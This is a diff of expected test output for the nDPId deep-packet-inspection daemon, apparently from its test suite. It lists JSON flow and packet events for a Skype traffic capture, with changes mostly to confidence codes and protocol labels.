+00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1431969759543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1431969759543,"pkt":"0NQSxnP1PBXCt3IOCABFwABMl\/4AAEAR3SbAqAEiEf0w9QB7AHsAOFSa4wIG7AAAChwAAPSnEf0w9dkEndkb+ycx2QSd2Rb0\/7nZBJ3ZG\/snMdkEnl+LA3WC"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2763,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1431969759588,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1431969759588,"pkt":"PBXCt3IO0NQSxnP1CABFAABMAABAADgRPeUR\/TD1wKgBIgB7AHsAOA1EJAEG7AAAAAAAAAAMR1BTc9kEnl2e8n962QSeX4sDdYLZBJ5fkbdSxdkEnl+RubQR"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABArS9AAEAG3hDAqAEiTKehBsPXTzInl3a\/AAAAALAC\/\/8aLgAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} @@ -1070,7 +1070,7 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1431969789832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969789832,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcbhAAEAG1ffAqAEiTsric8PgcYPYQ6AmAAAAALAC\/\/+PtQAAAgQFtAEDAwUBAQgKPiTITAAAAAAEAgAA"} 00539{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1431969789851,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969789851,"pkt":"AQBeAAD7PBXCt3IOCABGAAAgDOsAAAECdSfAqAEi4AAA+5QEAAAWAAkE4AAA+w=="} -00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3187,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1431969789919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969789919,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8evFAAHMGmcJOyuJzwKgBInGDw+BU8I6O2EOgJ6ASIADRMgAAAgQFrAEDAwgEAggKAlDJrD4kyEw="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3188,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1431969789919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969789919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0W4RAAEAG7DfAqAEiTsric8PgcYPYQ6AnVPCOj4AQECwPdQAAAQEICj4kyKMCUMms"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969791166,"flow_last_seen":1431969791166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969791166,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -1086,7 +1086,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3231,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1431969793781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXRdAAEAGSWvAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/B8AAAAgQFtAEDAwUBAQgKPiTXqwAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1431969793871,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969793871,"pkt":"0NQSxnP1PBXCt3IOCABFAAA68cwAAEARBXPAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1431969794784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969794784,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/CFAAEAGqmDAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/++BwAAAgQFtAEDAwUBAQgKPiTblAAAAAAEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3236,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1431969794907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969794907,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ITcAAEAR1gjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3239,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1431969796001,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969796001,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6focAAEAReLjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} @@ -1107,7 +1107,7 @@ 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1116,7 +1116,7 @@ 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1137,46 +1137,46 @@ 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 